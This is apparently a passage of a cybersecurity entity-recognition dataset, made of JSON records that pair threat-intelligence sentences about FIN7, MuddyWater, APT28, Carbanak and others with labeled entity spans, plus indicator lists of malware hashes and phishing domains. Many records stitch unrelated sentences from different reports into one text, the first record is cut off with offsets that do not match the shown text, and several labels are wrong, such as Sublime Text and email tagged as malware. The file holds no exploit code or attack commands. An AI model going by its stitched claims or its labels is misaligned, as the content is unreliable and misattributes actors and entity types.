The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . The new GRIFFON implant is written to the hard drive before each execution , limiting the file-less” aspect of this method . Given FIN7’s previous use of false security companies , we decided to look deeper into this one . This activity cluster , which Kaspersky Lab has followed for a few years , uses various implants for targeting mainly banks , and developers of banking and money processing software solutions . FIN7’s last campaigns were targeting banks in Europe and Central America . After a successful penetration , FIN7 uses its own backdoors and the CobaltStrike framework or Powershell Empire components to hop to interesting parts of the network , where it can monetize its access . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . This threat actor stole suspected of stealing €13 million from Bank of Valetta , Malta earlier this year . In fact , AveMaria is a classic infostealer bot that collects all possible credentials from various types of software: browsers , email clients , messengers , etc. , and can act as a keylogger . They also use AutoIT droppers , password-protected EXE files and even ISO images . To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Interestingly , this actor targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . 
At the end of 2018 , while searching for new FIN7 campaigns via telemetry , we discovered a set of activity that we temporarily called CopyPaste” from a previously unknown APT . FIN7 and Cobalt used decoy 302 HTTP redirections too , FIN7 on its GRIFFON C2s before January 2018 , and Cobalt , on its staging servers , similar to CopyPaste . Quite recently , FIN7 threat actors typosquatted the brand Digicert” using the domain name digicert-cdn[.]com , which is used as a command and control server for their GRIFFON implants . The first of them is the well-known FIN7 , which specializes in attacking various companies to get access to financial data or PoS infrastructure . The second one is CobaltGoblin Carbanak EmpireMonkey , which uses the same toolkit , techniques and similar infrastructure but targets only financial institutions and associated software/services providers . we observe , with various level of confidence , that there are several interconnected groups using very similar toolkits and the same infrastructure to conduct their cyberattacks . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . At the end of 2018 , the cluster started to use not only CobaltStrike but also Powershell Empire in order to gain a foothold on the victims’ networks . FIN7 thus continues to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . MuddyWater is widely regarded as a long-lived APT group in the Middle East . From February to April 2019 , MuddyWater launched a series of spear-phishing attacks against governments , educational institutions , financial , telecommunications and defense companies in Turkey , Iran , Afghanistan , Iraq , Tajikistan and Azerbaijan . 
FIN7 thus continue to use effective spearphishing campaigns in conjunction with well-known MS Office exploits generated by the framework . We also unearthed and detailed our other findings on MuddyWater , such as its connection to four Android malware variants and its use of false flag techniques , among others , in our report New MuddyWater Activities Uncovered: Threat Actors Used Multi-Stage Backdoors , False Flags , Android malware , and More . Instead , the campaign used compromised legitimate accounts to trick victims into installing malware . Notably , the group’s use of email as infection vector seems to yield success for their campaigns . We also observed MuddyWater’s use of multiple open source post-exploitation tools , which they deployed after successfully compromising a target . The attacker also connected to the compromised servers from IP addresses that were linked to dynamic domain names used as C&Cs by the delivered payloads . The main payload is usually Imminent Monitor RAT ; however , at the beginning of 2018 , we also observed the use of LuminosityLink RAT , NetWire RAT , and NjRAT . In a case in June 2019 , we also noticed Warzone RAT being used . Xpert RAT reportedly first appeared in 2011 . The first version of Proyecto RAT” was published at the end of 2010 . 
But with the West African gang we’ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime .", "spans": {"THREAT_ACTOR: Gamaredon": [[38, 47]], "ORGANIZATION: FortiGuard Labs": [[56, 71]], "THREAT_ACTOR: actors": [[164, 170], [893, 899], [1712, 1718]], "THREAT_ACTOR: Emissary Panda": [[240, 254], [1316, 1330]], "MALWARE: China Chopper": [[279, 292], [1131, 1144]], "VULNERABILITY: CVE-2019-0604": [[500, 513]], "MALWARE: python script": [[579, 592]], "VULNERABILITY: CVE-2017-0144": [[648, 661], [987, 1000]], "VULNERABILITY: EternalBlue": [[664, 675], [1003, 1014]], "FILEPATH: errr.aspx": [[712, 721]], "ORGANIZATION: Microsoft’s": [[746, 757]], "FILEPATH: MS17-010": [[1042, 1050]], "THREAT_ACTOR: they": [[1121, 1125]], "TOOL: webshells": [[1155, 1164]], "SYSTEM: Linux": [[1559, 1564]], "ORGANIZATION: financial": [[1597, 1606], [5187, 5196], [5979, 5988], [6158, 6167], [6477, 6486], [7136, 7145]], "ORGANIZATION: vulnerable servers": [[1670, 1688]], "MALWARE: Sublime Text": [[1790, 1802]], "MALWARE: Media application": [[1842, 1859]], "TOOL: DLL": [[1903, 1906]], "THREAT_ACTOR: It": [[1928, 1930]], "THREAT_ACTOR: group’s": [[2050, 2057], [7826, 7833]], "MALWARE: stealing tools": [[2118, 2132]], "MALWARE: document stealers": [[2165, 2182]], "MALWARE: EvilGnome": [[2287, 2296]], "THREAT_ACTOR: Gamaredon group": [[2350, 2365]], "THREAT_ACTOR: FIN7": [[2383, 2387], [2517, 2521], [2741, 2745], [2955, 2959], [3094, 3098], [3339, 3343], [4230, 4234], [4508, 4512], [5388, 5392], [5521, 5525], [5576, 5580], [5700, 5704], [5906, 5910], [6785, 6789], [7257, 7261]], "THREAT_ACTOR: attacker groups": [[2692, 2707]], "ORGANIZATION: Kaspersky": [[2807, 2816], [3958, 3967]], "ORGANIZATION: Lab’s Global Research and Analysis Team": [[2817, 2856]], "TOOL: email": [[3164, 3169], [4760, 4765], [8659, 8664]], "MALWARE: malicious Office document": [[3400, 3425]], "FILEPATH: GRIFFON": [[3538, 3545], [3713, 3720]], 
"THREAT_ACTOR: FIN7’s": [[3836, 3842], [4122, 4128]], "ORGANIZATION: security companies": [[3865, 3883]], "THREAT_ACTOR: activity cluster": [[3933, 3949]], "ORGANIZATION: banks": [[4046, 4051], [4159, 4164]], "ORGANIZATION: money processing": [[4084, 4100]], "MALWARE: backdoors": [[4248, 4257]], "MALWARE: CobaltStrike framework": [[4266, 4288]], "MALWARE: Powershell": [[4292, 4302], [6712, 6722]], "THREAT_ACTOR: AveMaria": [[4401, 4409]], "ORGANIZATION: Bank": [[4586, 4590]], "FILEPATH: AveMaria": [[4640, 4648]], "THREAT_ACTOR: They": [[4825, 4829]], "MALWARE: AutoIT droppers": [[4839, 4854]], "THREAT_ACTOR: cyber criminals": [[4939, 4954]], "MALWARE: spearphishing emails": [[4959, 4979]], "MALWARE: attachments:": [[5002, 5014]], "MALWARE: documents": [[5025, 5034], [5117, 5126]], "VULNERABILITY: CVE-2017-11882": [[5097, 5111]], "THREAT_ACTOR: actor": [[5172, 5177]], "THREAT_ACTOR: Cobalt": [[5530, 5536]], "ORGANIZATION: Digicert”": [[5742, 5751]], "MALWARE: command": [[5814, 5821]], "MALWARE: control server": [[5826, 5840]], "ORGANIZATION: various companies": [[5944, 5961]], "THREAT_ACTOR: CobaltGoblin": [[6036, 6048]], "THREAT_ACTOR: Carbanak": [[6049, 6057]], "THREAT_ACTOR: EmpireMonkey": [[6058, 6070]], "THREAT_ACTOR: groups": [[6312, 6318]], "MALWARE: similar toolkits": [[6330, 6346]], "MALWARE: infrastructure": [[6360, 6374]], "THREAT_ACTOR: CopyPaste": [[6446, 6455]], "ORGANIZATION: companies": [[6500, 6509]], "ORGANIZATION: training center": [[6615, 6630]], "THREAT_ACTOR: cluster": [[6658, 6665]], "MALWARE: CobaltStrike": [[6690, 6702]], "THREAT_ACTOR: MuddyWater": [[6925, 6935], [7032, 7042], [7449, 7459]], "ORGANIZATION: governments": [[7095, 7106]], "ORGANIZATION: educational institutions": [[7109, 7133]], "ORGANIZATION: telecommunications": [[7148, 7166]], "ORGANIZATION: defense": [[7171, 7178]], "SYSTEM: Android": [[7493, 7500], [7680, 7687]], "MALWARE: malware": [[7501, 7508], [7688, 7695]], "MALWARE: Multi-Stage Backdoors": [[7642, 7663]], "MALWARE: 
False Flags": [[7666, 7677]], "MALWARE: compromised legitimate accounts": [[7737, 7768]], "MALWARE: email": [[7841, 7846]], "THREAT_ACTOR: MuddyWater’s": [[7929, 7941]], "MALWARE: post-exploitation tools": [[7970, 7993]], "THREAT_ACTOR: attacker": [[8063, 8071]], "MALWARE: delivered payloads": [[8193, 8211]], "FILEPATH: Monitor RAT": [[8251, 8262]], "FILEPATH: LuminosityLink RAT": [[8330, 8348]], "FILEPATH: NetWire RAT": [[8351, 8362]], "FILEPATH: NjRAT": [[8369, 8374]], "FILEPATH: Warzone RAT": [[8418, 8429]], "FILEPATH: Xpert RAT": [[8443, 8452]], "FILEPATH: Proyecto RAT”": [[8510, 8523]], "THREAT_ACTOR: Scattered Canary": [[8602, 8618]]}, "info": {"id": "cyberner_stix_train_005226", "source": "cyberner_stix_train"}} {"text": "Cannon runs the downloaded file from the specified path .", "spans": {"MALWARE: Cannon": [[0, 6]]}, "info": {"id": "cyberner_stix_train_005227", "source": "cyberner_stix_train"}} {"text": "For example , the Ztorg Trojan has been uploaded to Google Play almost 100 times since September 2016 . Hackers used the remote access to detect servers of their interest in the internal network . An additional module written by the group called ScreenBooking is used to capture credit card data . # 147 : The dangers of \" Mercenary \" groups and the spyware they create Upcoming events where you can find Talos “ Most prevalent malware files ” is taking a break this week for maintenance .", "spans": {"MALWARE: Ztorg Trojan": [[18, 30]], "SYSTEM: Google Play": [[52, 63]], "MALWARE: ScreenBooking": [[246, 259]], "THREAT_ACTOR: Mercenary \" groups": [[323, 341]], "ORGANIZATION: Talos": [[405, 410]]}, "info": {"id": "cyberner_stix_train_005228", "source": "cyberner_stix_train"}} {"text": "Lastly , the entire json object is encoded with Base64 and undergoes another stage of encryption , and then sent to the server :", "spans": {}, "info": {"id": "cyberner_stix_train_005229", "source": "cyberner_stix_train"}} {"text": "] com w3.changeip [ . 
APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence . In addition to the notably overt and large-scale campaigns with CozyDuke and CloudDuke , the Dukes also continued to engage in more covert , surgical campaigns using CosmicDuke .", "spans": {"THREAT_ACTOR: APT41": [[22, 27]], "TOOL: SOGU": [[45, 49]], "TOOL: CROSSWALK": [[54, 63]], "THREAT_ACTOR: Dukes": [[206, 211]], "MALWARE: CosmicDuke": [[279, 289]]}, "info": {"id": "cyberner_stix_train_005230", "source": "cyberner_stix_train"}} {"text": "The next step for the actor was to build MitM servers that impersonated legitimate services to capture user credentials . Due to tools and tactics in use we attribute the campaign to LuckyMouse Chinese-speaking actor ( also known as EmissaryPanda and APT27 ) .", "spans": {"THREAT_ACTOR: actor": [[22, 27]], "TOOL: MitM servers": [[41, 53]], "THREAT_ACTOR: LuckyMouse": [[183, 193]], "THREAT_ACTOR: EmissaryPanda": [[233, 246]], "THREAT_ACTOR: APT27": [[251, 256]]}, "info": {"id": "cyberner_stix_train_005231", "source": "cyberner_stix_train"}} {"text": "CTU researchers infer intent by aggregating observations , analyzing a threat group's activity , and placing the information in a wider context .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_005232", "source": "cyberner_stix_train"}} {"text": "This software is free and distributed under LGPL license . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . 
In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown .", "spans": {"VULNERABILITY: zero-day vulnerabilities": [[62, 86]], "VULNERABILITY: CVE-2011-3544": [[183, 196]], "VULNERABILITY: CVE-2010-0738": [[244, 257]], "ORGANIZATION: Dell SecureWorks'": [[290, 307]], "THREAT_ACTOR: activity groups": [[370, 385]], "THREAT_ACTOR: PROMETHIUM": [[388, 398]], "THREAT_ACTOR: NEODYMIUM": [[403, 412]], "VULNERABILITY: zeroday": [[471, 478]], "VULNERABILITY: exploit": [[479, 486]]}, "info": {"id": "cyberner_stix_train_005233", "source": "cyberner_stix_train"}} {"text": "Further analysis of the iOS app “ Concipit1248 ” showed that the server used , spy [ . A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services . in block number 7 but the edi value is assigned in block number 1 and 2 . As we ’ve already previously discussed in our 2017 predictions , these groups will constantly evolve and employ unique and advanced attack techniques .", "spans": {"THREAT_ACTOR: group": [[96, 101]], "THREAT_ACTOR: GCMAN": [[118, 123]], "THREAT_ACTOR: Metel Group": [[241, 252]], "ORGANIZATION: banking institutions": [[263, 283]]}, "info": {"id": "cyberner_stix_train_005234", "source": "cyberner_stix_train"}} {"text": "Click fraud PHAs simulate user clicks on ads instead of simply displaying ads and waiting for users to click them . A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies . 
The DPP is part of the pan-green coalition that favors Taiwanese independence over reunification with the mainland , and the party ’s victory would represent a shift away from the ruling Kuomintang ’s closer ties with the PRC . Chinese state - sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies , including the State Department .", "spans": {"ORGANIZATION: Kaspersky Labs": [[138, 152]], "TOOL: NetTraveler": [[164, 175]], "ORGANIZATION: PRC": [[468, 471]], "THREAT_ACTOR: Chinese state - sponsored actors": [[474, 506]], "ORGANIZATION: U.S.-based organizations": [[563, 587]], "ORGANIZATION: federal government agencies": [[592, 619]], "ORGANIZATION: State Department": [[636, 652]]}, "info": {"id": "cyberner_stix_train_005235", "source": "cyberner_stix_train"}} {"text": "Why you need the Bank Austria Security App : Due to outdated technology of the mobile network important data such as mTan SMS and online banking connections are transmitted unencrypted . Obtaining access to this ccTLD registrars would have allowed attackers to hijack any domain that used those ccTLDs . The group conducted a campaign in May 2016 and has heavily targeted Turkish victims .", "spans": {"SYSTEM: Bank Austria Security App": [[17, 42]], "THREAT_ACTOR: attackers": [[248, 257]]}, "info": {"id": "cyberner_stix_train_005236", "source": "cyberner_stix_train"}} {"text": "A very unique technique is being used to inject this Trojan into an Android system where an attacker places a component of it into the boot partition of the file system and modify the 'init ' script ( initialize the operating system ) to re-load the malware as you switch on your android . The decoy slideshows all contain photos from very meaningful events to individuals in Thailand , suggesting that the actors continually look for impactful events to use to disguise their attacks . 
The nature of “ Unit 61398 ’s ” work is considered by China to be a state secret ; however , we believe it engages in harmful “ Computer Network Operations. ” Unit 61398 is partially situated on Datong Road in Gaoqiaozhen , which is located in the Pudong New Area of Shanghai . According to HTTP headers of the server , the applet was uploaded on February 11 , 2013 , one month after the Metasploit code was published and two days before Oracle issued a security alert regarding the vulnerability .", "spans": {"SYSTEM: Android": [[68, 75]], "SYSTEM: android": [[280, 287]], "TOOL: decoy slideshows": [[294, 310]], "ORGANIZATION: Unit 61398": [[503, 513], [646, 656]], "SYSTEM: HTTP headers of the server": [[778, 804]], "ORGANIZATION: Oracle": [[925, 931]], "VULNERABILITY: vulnerability": [[970, 983]]}, "info": {"id": "cyberner_stix_train_005237", "source": "cyberner_stix_train"}} {"text": "The recent activity X-Force IRIS is seeing from the Shamoon attackers has so far been detected in two waves , but those are likely to subside following the public attention the cases have garnered since late 2016 .", "spans": {"ORGANIZATION: X-Force IRIS": [[20, 32]]}, "info": {"id": "cyberner_stix_train_005238", "source": "cyberner_stix_train"}} {"text": "Analysis of one of the threat actor ’s documents found that if the macro executes , it launches two separate PowerShell Scripts .", "spans": {"TOOL: PowerShell": [[109, 119]]}, "info": {"id": "cyberner_stix_train_005239", "source": "cyberner_stix_train"}} {"text": "Some hackers even went onto use the Cisco exploits in the wild . 
Over the months following the elections , the accounts of Iranians that had been compromised by the actors were then used for spreading the malware .", "spans": {"VULNERABILITY: Cisco exploits": [[36, 50]], "ORGANIZATION: Iranians": [[123, 131]]}, "info": {"id": "cyberner_stix_train_005240", "source": "cyberner_stix_train"}} {"text": "Our eyes fell on the latest version of the Trojan , which is designed to steal money from owners of Android devices connected to the mobile banking service of one of Russia ’ s largest banks . To better understand how the adversary was operating and what other actions they had performed , CTU researchers examined cmd.exe and its supporting processes to uncover additional command line artifacts . As we ’ve observed with cybercriminal groups that aim to maximize profits for every campaign , silence does n’t necessarily mean inactivity . None LIGHTWORK is a disruption tool written in C++ that implements the IEC-104 protocol to modify the state of RTUs over TCP .", "spans": {"SYSTEM: Android": [[100, 107]], "ORGANIZATION: CTU": [[290, 293]], "MALWARE: cmd.exe": [[315, 322]], "TOOL: LIGHTWORK": [[546, 555]]}, "info": {"id": "cyberner_stix_train_005241", "source": "cyberner_stix_train"}} {"text": "Finally , research yielded a relatively unique sample .", "spans": {}, "info": {"id": "cyberner_stix_train_005242", "source": "cyberner_stix_train"}} {"text": "REQUEST_INSTALL_PACKAGES - make a request to install packages . ined in the archive is called DriverInstallerU.exe but its metadata shows that its original name is Interenet Assistant.exe . All of the Emissary we've collected are written in Traditional Chinese , which is used primarily in Taiwan and Hong Kong .", "spans": {"MALWARE: DriverInstallerU.exe": [[94, 114]], "MALWARE: Interenet Assistant.exe": [[164, 187]], "MALWARE: Emissary": [[201, 209]]}, "info": {"id": "cyberner_stix_train_005243", "source": "cyberner_stix_train"}} {"text": "Geo-location . 
Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . In early May 2016 , both PROMETHIUM and NEODYMIUM started conducting attack campaigns against specific individuals in Europe .", "spans": {"VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[102, 159]], "VULNERABILITY: CVE-2014-6332": [[162, 175]], "THREAT_ACTOR: PROMETHIUM": [[260, 270]], "THREAT_ACTOR: NEODYMIUM": [[275, 284]], "ORGANIZATION: specific individuals": [[329, 349]]}, "info": {"id": "cyberner_stix_train_005244", "source": "cyberner_stix_train"}} {"text": "If the mobile operator does n't enforce proper client isolation , it is possible that the infected devices are also exposed to the rest of the cellular network . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector . An .mp3 file of a song by the famous Syrian singer Asala Nasri ( song name : Fen Habibi , translation : “ where is my loved one? ” ) 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 . Since the beginning of 2023 , the majority of observed KillNet targeting has focused on the U.S. , Europe , and international institutions such as NATO .", "spans": {"TOOL: custom dropper": [[197, 211]], "FILEPATH: .mp3": [[279, 283]], "FILEPATH: 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964": [[409, 473]]}, "info": {"id": "cyberner_stix_train_005245", "source": "cyberner_stix_train"}} {"text": "] zqo-japan [ . After compromising a political organization , APT28 will steal internal data . The controller responds with the 253.25.42.87 A record . 
CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"ORGANIZATION: political organization": [[37, 59]], "THREAT_ACTOR: APT28": [[62, 67]], "IP_ADDRESS: 253.25.42.87": [[128, 140]], "ORGANIZATION: CrowdStrike incident responders": [[152, 183]], "THREAT_ACTOR: threat actor": [[393, 405]]}, "info": {"id": "cyberner_stix_train_005246", "source": "cyberner_stix_train"}} {"text": "Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time . Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": {"MALWARE: CARBANAK": [[80, 88]], "VULNERABILITY: 0-day": [[250, 255]], "TOOL: Adobe Flash Player": [[258, 276]], "VULNERABILITY: exploit": [[277, 284]]}, "info": {"id": "cyberner_stix_train_005247", "source": "cyberner_stix_train"}} {"text": "We have previously detected groups we suspect are affiliated with the North Korean government compromising electric utilities in South Korea , but these compromises did not lead to a disruption of the power supply . 
Recently , Trend Micro researchers came across a new mobile malware family which we have called GnatSpy .", "spans": {"THREAT_ACTOR: groups": [[28, 34]], "ORGANIZATION: government": [[83, 93]], "ORGANIZATION: electric": [[107, 115]], "ORGANIZATION: Trend Micro": [[227, 238]], "MALWARE: GnatSpy": [[312, 319]]}, "info": {"id": "cyberner_stix_train_005248", "source": "cyberner_stix_train"}} {"text": "In this case , however , the hacktool had an unusual characteristic not typically seen with this type of file ; it was signed with a valid code-signing certificate .", "spans": {}, "info": {"id": "cyberner_stix_train_005249", "source": "cyberner_stix_train"}} {"text": "The targeting of private sector interests by APT32 is notable and FireEye believes the actor poses significant risk to companies doing business in , or preparing to invest in , the country . Since last week , iSIGHT Partners has worked to provide details on the power outage in Ukraine to our global customers .", "spans": {"THREAT_ACTOR: APT32": [[45, 50]], "ORGANIZATION: FireEye": [[66, 73]], "ORGANIZATION: business": [[135, 143]], "ORGANIZATION: iSIGHT Partners": [[209, 224]], "ORGANIZATION: customers": [[300, 309]]}, "info": {"id": "cyberner_stix_train_005250", "source": "cyberner_stix_train"}} {"text": "'' This DLL contains one root class called \" eClient , '' which is the core of the trojan . Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications . 
The Elfin espionage group ( aka APT33 ) has remained highly active over the past three years , attacking at least 50 organizations in Saudi Arabia , the United States , and a range of other countries .", "spans": {"ORGANIZATION: Cisco Talos": [[92, 103]], "TOOL: China Chopper": [[127, 140], [272, 285]], "THREAT_ACTOR: attackers": [[252, 261]], "THREAT_ACTOR: Elfin": [[326, 331]], "THREAT_ACTOR: APT33": [[354, 359]]}, "info": {"id": "cyberner_stix_train_005251", "source": "cyberner_stix_train"}} {"text": "He posted a tweet to The New York Times report , sarcastically writing , \" If only two people had called this company out for their backdoors several times over the last few years . The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 . Gh0stRAt Downloader : e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c .", "spans": {"ORGANIZATION: New York Times": [[25, 39]], "MALWARE: sample": [[328, 334]], "VULNERABILITY: CVE-2017-11882": [[354, 368]], "VULNERABILITY: CVE-2018-0802": [[372, 385]], "MALWARE: Gh0stRAt Downloader": [[388, 407]], "FILEPATH: e34f4a9c598ad3bb243cb39969fb9509427ff9c08e63e8811ad26b72af046f0c": [[410, 474]]}, "info": {"id": "cyberner_stix_train_005252", "source": "cyberner_stix_train"}} {"text": "Given this , and the naming convention of the submissions ( .virus ) , the submitter hash most likely belongs to an AV vendor or sandboxing environment that automatically submits samples to online malware databases . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . 
ClearSky 's September 2014 blog post first described active attacks using a piece of malware they dubbed ' Gholee ' ( as appears in a malicious payload export function , potentially named after a popular Iranian singer9 ) .", "spans": {"MALWARE: XAgent": [[231, 237]], "MALWARE: IOS_XAGENT.A": [[250, 262]], "MALWARE: MadCap": [[322, 328]], "MALWARE: XAGENT.B": [[346, 354]], "ORGANIZATION: ClearSky": [[357, 365]], "MALWARE: Gholee": [[464, 470]]}, "info": {"id": "cyberner_stix_train_005253", "source": "cyberner_stix_train"}} {"text": "] netupload404 [ . Unit 42 published a blog at the beginning of May titled \" Prince of Persia \" , in which we described the discovery of a decade-long campaign using a formerly unknown malware family , Infy , that targeted government and industry interests worldwide . However , we have evidence to suggest that APT1 is running hundreds , and likely thousands , of other servers ( see the Domains section below ) . Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation , such as through the use of virtualization technology.[4 ] Bundlore uses the mktemp utility to make unique file and directory names for payloads , such as TMP_DIR=`mktemp", "spans": {"ORGANIZATION: Unit 42": [[19, 26]], "TOOL: Infy": [[202, 206]], "ORGANIZATION: government": [[223, 233]], "ORGANIZATION: industry": [[238, 246]], "THREAT_ACTOR: APT1": [[312, 316]], "THREAT_ACTOR: Adversaries": [[415, 426]], "MALWARE: Bundlore": [[642, 650]], "TOOL: mktemp utility": [[660, 674]]}, "info": {"id": "cyberner_stix_train_005254", "source": "cyberner_stix_train"}} {"text": "We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[104, 114]]}, "info": {"id": "cyberner_stix_train_005255", "source": "cyberner_stix_train"}} {"text": "NTDS.dit contains Active Directory 
data , including password hashes for all users on a domain .", "spans": {"FILEPATH: NTDS.dit": [[0, 8]], "TOOL: Active Directory": [[18, 34]]}, "info": {"id": "cyberner_stix_train_005256", "source": "cyberner_stix_train"}} {"text": "The string of comma separated hexadecimal values is passed as a parameter when loading the SWF file downloaded in ‘ onload2 ’ .", "spans": {"TOOL: SWF": [[91, 94]]}, "info": {"id": "cyberner_stix_train_005257", "source": "cyberner_stix_train"}} {"text": "Most samples of the malware reportedly function as a basic reconnaissance tool and downloader .", "spans": {}, "info": {"id": "cyberner_stix_train_005258", "source": "cyberner_stix_train"}} {"text": "It was implemented by sending an SMS message containing a one-time password ( OTP ) to the client ’ s mobile device . The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . ] com , which we previously identified in October 2017 to be an OilRig C2 .", "spans": {"THREAT_ACTOR: group": [[122, 127]], "TOOL: legitimate administration tools": [[133, 164]], "THREAT_ACTOR: OilRig": [[375, 381]], "TOOL: C2": [[382, 384]]}, "info": {"id": "cyberner_stix_train_005259", "source": "cyberner_stix_train"}} {"text": "This version has some small modifications which seems to be unused , as the malware behaviour is the same as the previous version . The backdoor was deployed using the Notepad++ updater and sideloading malicious DLL , as noted in APT10’s targeting of Japanese corporations in July 2018 . These threats shared infrastructure between July 2012 and April 2013 .", "spans": {"THREAT_ACTOR: APT10’s": [[230, 237]], "ORGANIZATION: Japanese corporations": [[251, 272]]}, "info": {"id": "cyberner_stix_train_005260", "source": "cyberner_stix_train"}} {"text": "The system service ‘ AccountManagerService ’ looks for the application that can process this request . 
\" Buhgalter \" means \" accountant \" in Russian . The files are given new , random names , which are generated by concatenating words and numbers based on the time of execution ( for example , C:\\Users\\\\Favorites\\\\Res.Center.ponse\\ ) . Compromised websites ( WordPress appears to be the top target ) are injected with a code snippet that replaces the current webpage with the aforementioned fake updates templates .", "spans": {"ORGANIZATION: WordPress appears to be the top target": [[375, 413]]}, "info": {"id": "cyberner_stix_train_005261", "source": "cyberner_stix_train"}} {"text": "The indicators associated with the blog article are available in the ThreatConnect Technical Blogs and Reports source here .", "spans": {"ORGANIZATION: ThreatConnect": [[69, 82]]}, "info": {"id": "cyberner_stix_train_005262", "source": "cyberner_stix_train"}} {"text": "We observe similar keyboard patterns in other samples : “ 567%^& ” , “ zxc!@#ASD ” .", "spans": {}, "info": {"id": "cyberner_stix_train_005263", "source": "cyberner_stix_train"}} {"text": "Once in a while , it sends a packet to its C & C server containing the collected device data along with all the saved SMS messages . LATINUM makes a concerted effort to hide their infection tracks , by self-deleting malicious components , or by using server side logic in ' one shot mode ' where remotely hosted malicious components are only allowed to load once . The email had no subject and what initially drew our attention to OilRig 's attack was the content of the spear phishing email .", "spans": {"THREAT_ACTOR: LATINUM": [[133, 140]], "TOOL: self-deleting malicious components": [[202, 236]], "TOOL: server side logic": [[251, 268]], "THREAT_ACTOR: OilRig": [[431, 437]]}, "info": {"id": "cyberner_stix_train_005264", "source": "cyberner_stix_train"}} {"text": "In a case in June 2019 , we also noticed Warzone RAT being used . 
According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file .", "spans": {"MALWARE: Warzone RAT": [[41, 52]], "ORGANIZATION: Deepen": [[79, 85]], "THREAT_ACTOR: APT6": [[88, 92]], "MALWARE: PDF": [[148, 151]], "MALWARE: ZIP": [[156, 159]], "FILEPATH: SCR file": [[236, 244]]}, "info": {"id": "cyberner_stix_train_005265", "source": "cyberner_stix_train"}} {"text": "And TikTok is no exception . The initial infection vector used by the threat actor also changed over time , during 2018 we have seen multiple uses of self-extracting archives instead of malicious documents with AutoHotKey , which displayed a decoy image to the user . Ids.me .", "spans": {"SYSTEM: TikTok": [[4, 10]], "TOOL: archives": [[166, 174]], "THREAT_ACTOR: AutoHotKey": [[211, 221]], "TOOL: decoy image": [[242, 253]], "DOMAIN: Ids.me": [[268, 274]]}, "info": {"id": "cyberner_stix_train_005266", "source": "cyberner_stix_train"}} {"text": "TOOLS AND TECHNIQUES OF THE DUKES .", "spans": {"THREAT_ACTOR: DUKES": [[28, 33]]}, "info": {"id": "cyberner_stix_train_005267", "source": "cyberner_stix_train"}} {"text": "Download additional payloads .", "spans": {}, "info": {"id": "cyberner_stix_train_005268", "source": "cyberner_stix_train"}} {"text": "As the pattern of chemical industry targets emerged , we internally code-named the attack campaign Nitro .", "spans": {"THREAT_ACTOR: Nitro": [[99, 104]]}, "info": {"id": "cyberner_stix_train_005269", "source": "cyberner_stix_train"}} {"text": "myyoula.ru sell-avito.ru sell-youla.ru sentel8ju67.com subito-li.pw subitop.pw web-gumtree.com whitehousejosh.com whitekalgoy3.com youlaprotect.ru Examples of malware 0497b6000a7a23e9e9b97472bc2d3799caf49cbbea1627ad4d87ae6e0b7e2a98 417fc112cd0610cc8c402742b0baab0a086b5c4164230009e11d34fdeee7d3fa Trend Micro also reported MuddyWater’s use of a new multi-stage PowerShell-based backdoor called POWERSTATS v3 . 
